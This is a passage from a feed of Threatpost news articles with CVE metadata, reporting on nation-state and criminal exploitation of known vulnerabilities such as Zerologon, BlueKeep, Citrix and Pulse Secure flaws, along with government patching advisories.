CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. \u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an 